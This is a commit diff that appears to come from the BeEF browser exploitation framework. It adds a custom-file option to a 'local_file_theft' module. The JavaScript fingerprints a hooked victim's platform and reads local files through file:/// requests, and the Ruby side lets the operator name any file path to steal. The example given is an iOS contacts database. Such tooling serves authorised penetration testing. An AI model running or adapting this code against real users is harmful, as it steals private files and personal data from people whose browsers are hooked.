updated local file theft to accept custom file path

2012-08-22 20:50:03 +12:00
parent f2d4a88810
commit ad2bc95cf0
2 changed files with 57 additions and 15 deletions
--- a/modules/misc/local_file_theft/command.js
+++ b/modules/misc/local_file_theft/command.js
@@ -86,6 +86,16 @@ result = '';
 							    }
 			    }

+    fileList['custom']=  {
+				    // user defined
+				    "discover"	:'',
+
+				    "post" 		:{
+							    'result':'<%== @target_file %>',
+							    }
+			    }
+
+
    functionList = {
 			    mac:{
 				    // OS X disovery
@@ -138,11 +148,25 @@ result = '';
 											    grabFiles(homedir,"ios")
 										    }
 									    }
-
-					    alert("ipad")
+                                        return true;
 					    }
 				    },

+                custom:{
+                // Grab custom stuff
+                    discover : function(){
+                                        tmp = new XMLHttpRequest()
+                                        tmp.open('get',fileList['custom']['discover'])
+                                        tmp.send()
+                                        tmp.onreadystatechange=function(){
+                                            if(tmp.readyState==4){
+                                                homedir = "file:///";
+                                                grabFiles(homedir,"custom")
+                                            }
+                                        }
+                                        return true;
+                        }
+                    },
 			    android:{
 			    // figure out what app (gmail, browser, or dolphin?) android 
 				    discover : function(){
@@ -172,19 +196,27 @@ result = '';


    function identify(){
-	    if(/.*Android.*/.test(navigator.userAgent)){
-		    return "android"
-	    } else if(/Linux.*/i.test(navigator.platform)){
-		    return "linux"
-	    } else if(/iP.*/i.test(navigator.platform)){
-		    return "ios"
-	    } else if(/.*Mac.*/i.test(navigator.userAgent)){
-		    return "mac"
-	    } else if(/.*Windows.*/i.test(navigator.userAgent)){
-		    return "windows"
-	    } else if(/.*hpwOS.*/i.test(navigator.platform)){
-		    return "webos"
-	    }
+        
+        // custom file is specified
+        if ('<%== @target_file %>' != 'autodetect') {
+            return "custom"
+
+        // determine a good file to steal based on platform
+        } else {
+            if(/.*Android.*/.test(navigator.userAgent)){
+                return "android"
+            } else if(/Linux.*/i.test(navigator.platform)){
+                return "linux"
+            } else if(/iP.*/i.test(navigator.platform)){
+                return "ios"
+            } else if(/.*Mac.*/i.test(navigator.userAgent)){
+                return "mac"
+            } else if(/.*Windows.*/i.test(navigator.userAgent)){
+                return "windows"
+            } else if(/.*hpwOS.*/i.test(navigator.platform)){
+                return "webos"
+            }
+        }
    }


--- a/modules/misc/local_file_theft/module.rb
+++ b/modules/misc/local_file_theft/module.rb
@@ -19,6 +19,16 @@

 class Local_file_theft < BeEF::Core::Command

+  def self.options
+    return [
+        {'name' => 'target_file', 
+         'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', 
+         'ui_label' => 'Target file',
+         'value' => 'autodetect'
+         } 
+    ]
+  end
+ 
   def post_execute
    content = {}
    content['result'] = @datastore['result']